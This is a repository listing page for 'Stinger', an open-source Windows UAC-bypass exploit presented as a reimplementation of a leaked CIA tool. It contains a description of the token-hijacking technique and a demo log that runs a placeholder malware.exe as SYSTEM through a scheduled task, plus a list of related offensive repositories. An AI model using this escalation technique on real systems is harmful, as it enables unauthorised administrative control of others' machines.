hackerhouse-opensource/Stinger hackerhouse-opensource/Stinger

  • Stars
    star
    205
  • Rank 190,315 (Top 4 %)
  • Language
    C++
  • Created 9 months ago
  • Updated 9 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
hackerhouse-opensource/Stinger
github

hackerhouse-opensource

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CIA UAC bypass implementation of Stinger that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as Administrator.

Stinger

CIA Vault7 leak describes Stinger[0] as a Privilege Escalation module in the "Fine Dining" toolset. Stinger is a "UAC bypass that obtains the token from an auto-elevated process, modifies it, and reuses it to execute as administrator". This is an implementation of Stinger, including debugging routines and additional tradecraft for NT AUTHORITY\SYSTEM rights. The exploit works on Windows 7 through Windows 10 to run privileged code through token hijacking of an autoelevated process (e.g. Taskmgr.exe) from a UAC restricted process. This technique to steal a privileged token and elevate a thread also works on Windows 11, however it is not possible to use it for CreateProcessWithLogonW which detects BAD IMPERSONATION or with CreateFile, Registry, Process, COM ITask*, Named Pipes etc as the operations fail with ACESS_DENIED or E_BAD_IMPERSONATION. This exploit closely resembles UAC Magic[1] and thus it is believed that Stinger is an implementation of UAC Magic based on the description and time which it was used within the CIA for modular malware in "Fine Dining". This is a tokenhijacking attack that bypasses UAC on Windows 7 -> Windows 10, and on Windows 11 gives only an elevated thread to further experiment with. This exploit leverages a COM object ITaskService from the privileged thread to run commands under NT AUTHORITY\SYSTEM.

Here is an example of the UAC bypass being used on a vulnerable Windows 7 host.

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\TestUser\Downloads>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\TestUser\Downloads>Stinger.exe taskmgr.exe cmd.exe /c c:\\Temp\\malware.exe
Show our process security context...
User: TestUser
Domain: TESTPC
User SID: S-1-5-21-3089230831-4110903467-601958294-1001
Checking token DACL...
Allowed ACE: GENERIC_ALL
Account: TESTPC\TestUser
SID: S-1-5-21-3089230831-4110903467-601958294-1001
Allowed ACE: GENERIC_ALL
Account: NT AUTHORITY\SYSTEM
SID: S-1-5-18
Allowed ACE: GENERIC_READ GENERIC_EXECUTE
LookupAccountSid failed: 1332
SID: S-1-5-5-0-107317
Token is not elevated.
Token is not restricted
Dumping token privileges...
[-] Disabled Privilege: SeShutdownPrivilege Attributes : 0
[+] Enabled Privilege: SeChangeNotifyPrivilege Attributes : 3
    This privilege is enabled by default.
[-] Disabled Privilege: SeUndockPrivilege Attributes : 0
[-] Disabled Privilege: SeIncreaseWorkingSetPrivilege Attributes : 0
[-] Disabled Privilege: SeTimeZonePrivilege Attributes : 0
Process ID: 3992
Successfully duplicated token
H4x0r1nG the token ...
Enabling privilege: SeIncreaseQuotaPrivilege
Enabling privilege: SeSecurityPrivilege
Enabling privilege: SeTakeOwnershipPrivilege
Enabling privilege: SeLoadDriverPrivilege
Enabling privilege: SeSystemProfilePrivilege
Enabling privilege: SeSystemtimePrivilege
Enabling privilege: SeProfileSingleProcessPrivilege
Enabling privilege: SeIncreaseBasePriorityPrivilege
Enabling privilege: SeCreatePagefilePrivilege
Enabling privilege: SeBackupPrivilege
Enabling privilege: SeRestorePrivilege
Enabling privilege: SeShutdownPrivilege
Enabling privilege: SeDebugPrivilege
Enabling privilege: SeSystemEnvironmentPrivilege
Enabling privilege: SeChangeNotifyPrivilege
Enabling privilege: SeRemoteShutdownPrivilege
Enabling privilege: SeUndockPrivilege
Enabling privilege: SeManageVolumePrivilege
Enabling privilege: SeImpersonatePrivilege
Enabling privilege: SeCreateGlobalPrivilege
Enabling privilege: SeIncreaseWorkingSetPrivilege
Enabling privilege: SeTimeZonePrivilege
Enabling privilege: SeCreateSymbolicLinkPrivilege
Dropping IL...
Initialized medium IL SID
Token lowered to medium integrity
COM init...
Attemping to bypass UAC with the token...
ImpersonateLoggedOnUser succeeded.. 
Dumping our new security context..
User: TestUser
Domain: TESTPC
User SID: S-1-5-21-3089230831-4110903467-601958294-1001
Checking token DACL...
Allowed ACE: GENERIC_ALL
Account: BUILTIN\Administrators
SID: S-1-5-32-544
Allowed ACE: GENERIC_ALL
Account: NT AUTHORITY\SYSTEM
SID: S-1-5-18
Allowed ACE: GENERIC_READ GENERIC_EXECUTE
LookupAccountSid failed: 1332
SID: S-1-5-5-0-107317
Token is elevated!
Token is not restricted
Dumping token privileges...
[+] Enabled Privilege: SeIncreaseQuotaPrivilege Attributes : 2
[+] Enabled Privilege: SeSecurityPrivilege Attributes : 2
[-] Disabled Privilege: SeTakeOwnershipPrivilege Attributes : 0
[-] Disabled Privilege: SeLoadDriverPrivilege Attributes : 0
[+] Enabled Privilege: SeSystemProfilePrivilege Attributes : 2
[+] Enabled Privilege: SeSystemtimePrivilege Attributes : 2
[+] Enabled Privilege: SeProfileSingleProcessPrivilege Attributes : 2
[+] Enabled Privilege: SeIncreaseBasePriorityPrivilege Attributes : 2
[+] Enabled Privilege: SeCreatePagefilePrivilege Attributes : 2
[-] Disabled Privilege: SeBackupPrivilege Attributes : 0
[-] Disabled Privilege: SeRestorePrivilege Attributes : 0
[+] Enabled Privilege: SeShutdownPrivilege Attributes : 2
[-] Disabled Privilege: SeDebugPrivilege Attributes : 0
[+] Enabled Privilege: SeSystemEnvironmentPrivilege Attributes : 2
[+] Enabled Privilege: SeChangeNotifyPrivilege Attributes : 3
    This privilege is enabled by default.
[+] Enabled Privilege: SeRemoteShutdownPrivilege Attributes : 2
[+] Enabled Privilege: SeUndockPrivilege Attributes : 2
[+] Enabled Privilege: SeManageVolumePrivilege Attributes : 2
[-] Disabled Privilege: SeImpersonatePrivilege Attributes : 0
[+] Enabled Privilege: SeCreateGlobalPrivilege Attributes : 3
    This privilege is enabled by default.
[+] Enabled Privilege: SeIncreaseWorkingSetPrivilege Attributes : 2
[+] Enabled Privilege: SeTimeZonePrivilege Attributes : 2
[+] Enabled Privilege: SeCreateSymbolicLinkPrivilege Attributes : 2
Attemping to run command as NT AUTHORITY\SYSTEM via COM...
Created ITaskService..
Connected to ITaskService..
Registering the evil Task..
Task created successfully.
Executed command as NT AUTHORITY\SYSTEM... wait for cleanup
Task deleted successfully.

Your commands have executed under NT AUTHORITY\SYSTEM. Happy New Year!

References

License

These files are available under a Attribution-NonCommercial-NoDerivatives 4.0 International license.

More Repositories

1

iscsicpl_bypassUAC

UAC bypass for x64 Windows 7 - 11
C++
727
star
2

exploits

exploits and proof-of-concept vulnerability demonstration files from the team at Hacker House
C
389
star
3

Marble

The CIA's Marble Framework is designed to allow for flexible and easy-to-use obfuscation when developing tools.
C++
224
star
4

SignToolEx

Patching "signtool.exe" to accept expired certificates for code-signing.
C++
219
star
5

OffensiveLua

Offensive Lua.
Lua
146
star
6

Artillery

CIA UAC bypass implementation that utilizes elevated COM object to write to System32 and an auto-elevated process to execute as administrator.
C
146
star
7

ColorDataProxyUACBypass

Exploits undocumented elevated COM interface ICMLuaUtil via process spoofing to edit registry then calls ColorDataProxy to trigger UAC bypass. Win 7 & up.
C
130
star
8

WMIProcessWatcher

A CIA tradecraft technique to asynchronously detect when a process is created using WMI.
C++
113
star
9

tools

A collection of tools created for computer security research purposes.
Python
108
star
10

cve-2018-10933

cve-2018-10933 libssh authentication bypass
Dockerfile
107
star
11

backdoors

Tools for maintaining access to systems and proof-of-concept demonstrations.
Python
103
star
12

CompMgmtLauncher_DLL_UACBypass

CompMgmtLauncher & Sharepoint DLL Search Order hijacking UAC/persist via OneDrive
C++
100
star
13

MsSettingsDelegateExecute

Bypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key.
C++
74
star
14

pyongyang_2407

Pyongyang 2407 - Android ROM from North Korea, modified to run on WBW5511_MAINBOARD_P2 devices. Releases contains an archived ROM with all needed tools to boot DPRK Android on compatible hardware. This repository contains installation instructions, hardware documentation and exploits for disabling censorship tools of North Korea Android.
C
66
star
15

envschtasksuacbypass

Bypass UAC elevation on Windows 8 (build 9600) & above.
C++
53
star
16

documents

Papers, presentations and documents from the team at Hacker House.
Perl
47
star
17

shellcode

shellcode are codes designed to be injected into the memory space of another process during exploitation.
C
42
star
18

electionhacking

Diebold Accuvote-TSx Election Machine Hacking
C++
34
star
19

NoFaxGiven

Code Execution & Persistence in NETWORK SERVICE FAX Service
C++
30
star
20

Gigabyte_ElevatePersist

Giga-byte Control Center (GCC) is a software package designed for improved user experience of Gigabyte hardware, often found in gaming and performance PC's. A UAC elevation vulnerability exists that can be used for persistence in a novel fashion.
C++
30
star
21

AESCrypt

AES-256 Microsoft Cryptography API Example Use.
C++
27
star
22

rebirth

rebirth IOS11 - 11.3.1 jailbreak security research utility
C
22
star
23

cve-2021-34527

CVE-2021-34527 AddPrinterDriverEx() Privilege Escalation
C++
18
star
24

hackerhouse-opensource

Github profile
11
star
25

hfioquake3_DoS

ioquake3 engine is vulnerable to a remotely exploitable off-by-one overflow due to a miscalculated array index within the privileged admin console command banaddr. Attacker needs the rcon password to exploit this vulnerability.
Python
5
star